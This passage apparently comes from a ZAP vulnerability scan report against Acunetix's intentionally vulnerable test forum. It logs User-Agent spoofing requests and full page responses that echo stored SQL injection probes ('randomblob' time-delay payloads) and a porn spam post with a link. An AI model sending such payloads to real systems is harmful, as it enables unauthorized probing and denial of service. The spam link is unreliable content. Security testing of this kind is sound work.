src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 403 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:46 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 414 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:47 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 472 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:47 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 377 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:46 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
